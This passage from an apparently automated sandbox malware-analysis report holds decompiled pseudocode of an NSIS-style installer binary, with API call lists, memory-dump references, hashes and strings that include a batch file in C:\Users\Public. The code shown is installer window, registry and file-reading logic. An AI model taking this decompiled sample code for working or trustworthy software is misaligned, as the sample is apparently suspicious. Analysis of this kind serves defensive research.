									_t76 = CreateDialogParamW( *0x42a200,  *_t133 +  *0x4291e0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "~C@"), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x4291d8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041E1(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x4291d8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291cc - _t136;
									if( *0x4291cc != _t136) {
										goto L61;
									}
									ShowWindow( *0x4291d8, 8); // executed
									E0040422D(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4291d8);
						 *0x42a208 = _t136;
						EndDialog(_t128,  *0x421eb8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x4291d8, 0x40f, 0, 1);
						__eflags =  *0x4291cc;
						return 0 |  *0x4291cc == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x4236c8, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x4236c8,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00404248(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x4291d8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ac - _t136;
										if( *0x42a2ac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421eb8 = 1;
											L21:
											_push(0x78);
											L22:
											E004041BA();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421eb8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x4291d8);
						 *0x4291d8 = _a12;
						L58:
						_t144 =  *0x4256e8 - _t136; // 0x1
						if(_t144 == 0 &&  *0x4291d8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x4256e8 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                          0x00403d11
                                                          0x00403d1a
                                                          0x00403e5b
                                                          0x00403e5f
                                                          0x00403e63
                                                          0x00403e65
                                                          0x00403e6a
                                                          0x00403e75
                                                          0x00403e80
                                                          0x00403e85
                                                          0x00403e87
                                                          0x00403e89
                                                          0x00403e8c
                                                          0x00403e91
                                                          0x00403e9f
                                                          0x00403eac
                                                          0x00403eb3
                                                          0x00403eb3
                                                          0x00403eb4
                                                          0x00403eb4
                                                          0x00403eb9
                                                          0x00403ebf
                                                          0x00403ec6
                                                          0x00403ecc
                                                          0x00403ece
                                                          0x00403f0e
                                                          0x00403f13
                                                          0x00403f18
                                                          0x00403f18
                                                          0x00403f1d
                                                          0x00403f26
                                                          0x00403f28
                                                          0x00403f2d
                                                          0x00403f33
                                                          0x00403f37
                                                          0x00403f37
                                                          0x00403f3c
                                                          0x00403f42
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f4d
                                                          0x00403f53
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f5c
                                                          0x00403f64
                                                          0x00403f69
                                                          0x00403f6c
                                                          0x00403f72
                                                          0x00403f77
                                                          0x00403f7a
                                                          0x00403f80
                                                          0x00403f85
                                                          0x00403f88
                                                          0x00403f8e
                                                          0x00403f96
                                                          0x00403f9c
                                                          0x00403fa2
                                                          0x00403fa6
                                                          0x00403fad
                                                          0x00403fad
                                                          0x00403fad
                                                          0x00403fb7
                                                          0x00403fc9
                                                          0x00403fd5
                                                          0x00403fda
                                                          0x00403fe4
                                                          0x00403fea
                                                          0x00403fec
                                                          0x00403ff1
                                                          0x00403fee
                                                          0x00403fee
                                                          0x00403fee
                                                          0x00404001
                                                          0x00404019
                                                          0x0040401b
                                                          0x00404021
                                                          0x00404036
                                                          0x00404023
                                                          0x0040402c
                                                          0x0040402e
                                                          0x0040402e
                                                          0x0040403c
                                                          0x0040404d
                                                          0x00404063
                                                          0x0040406a
                                                          0x00404070
                                                          0x00404074
                                                          0x00404079
                                                          0x0040407b
                                                          0x00000000
                                                          0x00404081
                                                          0x00404081
                                                          0x00404083
                                                          0x00000000
                                                          0x00000000
                                                          0x00404089
                                                          0x0040408d
                                                          0x004040b2
                                                          0x004040b8
                                                          0x004040be
                                                          0x004040c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004040e6
                                                          0x004040ec
                                                          0x004040ee
                                                          0x004040f3
                                                          0x00000000
                                                          0x00000000
                                                          0x004040f9
                                                          0x004040fc
                                                          0x004040ff
                                                          0x00404116
                                                          0x00404122
                                                          0x0040413b
                                                          0x00404141
                                                          0x00404145
                                                          0x0040414a
                                                          0x00404150
                                                          0x00000000
                                                          0x00000000
                                                          0x0040415a
                                                          0x00404165
                                                          0x00000000
                                                          0x00404165
                                                          0x0040408f
                                                          0x00404095
                                                          0x00000000
                                                          0x00000000
                                                          0x0040409b
                                                          0x004040a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004040a7
                                                          0x0040407b
                                                          0x00404172
                                                          0x0040417e
                                                          0x00404185
                                                          0x00000000
                                                          0x00403ed0
                                                          0x00403ed0
                                                          0x00403ed3
                                                          0x00403f06
                                                          0x00403f06
                                                          0x00403f08
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f08
                                                          0x00403ed5
                                                          0x00403ed9
                                                          0x00403ede
                                                          0x00403ee0
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ef0
                                                          0x00403ef8
                                                          0x00000000
                                                          0x00403efe
                                                          0x00403d2c
                                                          0x00403d2c
                                                          0x00403d30
                                                          0x00403d35
                                                          0x00403d44
                                                          0x00403d44
                                                          0x00403d4d
                                                          0x00403d56
                                                          0x00403d61
                                                          0x00403d61
                                                          0x00403d6d
                                                          0x00403d89
                                                          0x00403d8c
                                                          0x00403d9f
                                                          0x00403da5
                                                          0x00403e48
                                                          0x00000000
                                                          0x00403e51
                                                          0x00403dab
                                                          0x00403db8
                                                          0x00403dba
                                                          0x00403dbc
                                                          0x00403ddb
                                                          0x00403ddb
                                                          0x00403dde
                                                          0x00403de3
                                                          0x00403de6
                                                          0x00403df6
                                                          0x00403df7
                                                          0x00403df9
                                                          0x00403e2f
                                                          0x00403e42
                                                          0x00000000
                                                          0x00403e42
                                                          0x00403dfb
                                                          0x00403e01
                                                          0x00403e1a
                                                          0x00403e1f
                                                          0x00403e21
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e23
                                                          0x00403e0f
                                                          0x00403e0f
                                                          0x00403e11
                                                          0x00403e11
                                                          0x00000000
                                                          0x00403e11
                                                          0x00403e04
                                                          0x00403e09
                                                          0x00000000
                                                          0x00403e09
                                                          0x00403de8
                                                          0x00403dee
                                                          0x00000000
                                                          0x00000000
                                                          0x00403df0
                                                          0x00000000
                                                          0x00403df0
                                                          0x00403de0
                                                          0x00000000
                                                          0x00403de0
                                                          0x00403dc6
                                                          0x00403dcd
                                                          0x00403dd3
                                                          0x00403dd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dd5
                                                          0x00403d91
                                                          0x00000000
                                                          0x00403d6f
                                                          0x00403d75
                                                          0x00403d7f
                                                          0x0040418b
                                                          0x0040418b
                                                          0x00404191
                                                          0x0040419e
                                                          0x004041a4
                                                          0x004041a4
                                                          0x004041ae
                                                          0x00000000
                                                          0x004041ae
                                                          0x00403d6d

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                          • ShowWindow.USER32(?), ref: 00403D61
                                                          • DestroyWindow.USER32 ref: 00403D75
                                                          • SetWindowLongW.USER32 ref: 00403D91
                                                          • GetDlgItem.USER32 ref: 00403DB2
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                          • GetDlgItem.USER32 ref: 00403E7B
                                                          • GetDlgItem.USER32 ref: 00403E85
                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403E9F
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                          • GetDlgItem.USER32 ref: 00403F96
                                                          • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                          • EnableWindow.USER32(?,?), ref: 00403FE4
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                                          • EnableMenuItem.USER32 ref: 00404001
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                          • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                          • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                          • String ID: 6B
                                                          • API String ID: 3906175533-4127139157
                                                          • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                          • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                          • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                          • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 303 4039d5-4039db lstrcatW 299->303 304 4039bf-4039d0 call 40611a 299->304 303->308 304->303 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 319 403ab1-403ad6 LoadImageW 313->319 320 403aa5-403aac call 40626e 313->320 314->313 315 403a1a-403a34 call 40611a 314->315 321 403a39-403a42 315->321 324 403b57-403b5f call 40140b 319->324 325 403ad8-403b08 RegisterClassW 319->325 320->319 321->313 322 403a44-403a48 321->322 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 352 403c03-403c05 349->352 356 403c07-403c0d 352->356 357 403c1f-403c21 call 40140b 352->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 365 403bf2-403bfb call 4038aa 361->365 362->338 365->332
                                                          C-Code - Quality: 96%
                                                          			E0040395A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a214;
				_t22 = E00406626(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x4236e8;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040611A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x4236e8, 0);
					__eflags =  *0x4236e8;
					if(__eflags == 0) {
						E0040611A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x4236e8, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406193(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C30(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth";
				 *0x42a2a0 =  *0x42a21c & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405C25(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") != 0) {
					L16:
					if(E00405C25(_t98, _t86) == 0) {
						E0040626E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a200, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x4291e8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C30(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E00405383(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291cc;
								if( *0x4291cc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236c8, 5); // executed
							_t39 = E004065B6("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065B6("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291a0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291a0);
								 *0x4291c4 = _t87;
								RegisterClassW(0x4291a0);
							}
							_t44 = DialogBoxParamW( *0x42a200,  *0x4291e0 + 0x00000069 & 0x0000ffff, 0, E00403D08, 0); // executed
							E004038AA(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a200;
						 *0x4291a4 = E00401000;
						 *0x4291b0 =  *0x42a200;
						 *0x4291b4 = _t30;
						 *0x4291c4 = 0x40a380;
						if(RegisterClassW(0x4291a0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236c8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a200, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281a0;
					E0040611A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281a0, 0);
					_t63 =  *0x4281a0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281a2;
						 *((short*)(E00405B4A(0x4281a2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040624C(_t86, E00405B1D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B69(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                          0x00403960
                                                          0x00403969
                                                          0x00403970
                                                          0x00403972
                                                          0x00403986
                                                          0x00403998
                                                          0x004039a1
                                                          0x004039aa
                                                          0x004039b1
                                                          0x004039b6
                                                          0x004039bd
                                                          0x004039d0
                                                          0x004039d0
                                                          0x004039db
                                                          0x00403974
                                                          0x0040397f
                                                          0x0040397f
                                                          0x004039e0
                                                          0x004039ea
                                                          0x004039f3
                                                          0x004039f8
                                                          0x00403a09
                                                          0x00403a9b
                                                          0x00403aa3
                                                          0x00403aac
                                                          0x00403aac
                                                          0x00403ac2
                                                          0x00403ac8
                                                          0x00403ad6
                                                          0x00403b57
                                                          0x00403b5f
                                                          0x00403b69
                                                          0x00403b6e
                                                          0x00403b74
                                                          0x00403bfe
                                                          0x00403c03
                                                          0x00403c05
                                                          0x00403c21
                                                          0x00000000
                                                          0x00403c21
                                                          0x00403c07
                                                          0x00403c0d
                                                          0x00403c15
                                                          0x00403c15
                                                          0x00000000
                                                          0x00403c0d
                                                          0x00403b82
                                                          0x00403b8d
                                                          0x00403b92
                                                          0x00403b94
                                                          0x00403b9b
                                                          0x00403b9b
                                                          0x00403ba6
                                                          0x00403bae
                                                          0x00403bb0
                                                          0x00403bb2
                                                          0x00403bbb
                                                          0x00403bbe
                                                          0x00403bc4
                                                          0x00403bc4
                                                          0x00403be3
                                                          0x00403bf4
                                                          0x00000000
                                                          0x00403bf9
                                                          0x00403b61
                                                          0x00403b63
                                                          0x00000000
                                                          0x00403ad8
                                                          0x00403ad8
                                                          0x00403ae4
                                                          0x00403aee
                                                          0x00403af4
                                                          0x00403af9
                                                          0x00403b08
                                                          0x00403c26
                                                          0x00403c26
                                                          0x00000000
                                                          0x00403c26
                                                          0x00403b17
                                                          0x00403b52
                                                          0x00000000
                                                          0x00403b52
                                                          0x00403a0f
                                                          0x00403a0f
                                                          0x00403a12
                                                          0x00403a14
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a22
                                                          0x00403a34
                                                          0x00403a39
                                                          0x00403a42
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a48
                                                          0x00403a4a
                                                          0x00403a57
                                                          0x00403a57
                                                          0x00403a60
                                                          0x00403a66
                                                          0x00403a8e
                                                          0x00403a96
                                                          0x00000000
                                                          0x00403a78
                                                          0x00403a79
                                                          0x00403a82
                                                          0x00403a88
                                                          0x00403a89
                                                          0x00000000
                                                          0x00403a89
                                                          0x00403a84
                                                          0x00403a86
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a86
                                                          0x00403a66

                                                          APIs
                                                            • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                            • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                          • lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A79
                                                          • LoadImageW.USER32 ref: 00403AC2
                                                            • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                          • RegisterClassW.USER32 ref: 00403AFF
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                          • CreateWindowExW.USER32 ref: 00403B4C
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                          • GetClassInfoW.USER32 ref: 00403BAE
                                                          • GetClassInfoW.USER32 ref: 00403BBB
                                                          • RegisterClassW.USER32 ref: 00403BC4
                                                          • DialogBoxParamW.USER32 ref: 00403BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\Public\fcab.bat" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                          • API String ID: 1975747703-1748783622
                                                          • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                          • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                          • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                          • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402EC1 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                          C-Code - Quality: 80%
                                                          			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x42a210 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x438800, 0x400);
				_t89 = E00405D3E(0x438800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Public";
				E0040624C(L"C:\\Users\\Public", 0x438800);
				E0040624C(0x439000, E00405B69(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x418ea4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x42a218 - _t82;
					if( *0x42a218 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004032F5( *0x42a218 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
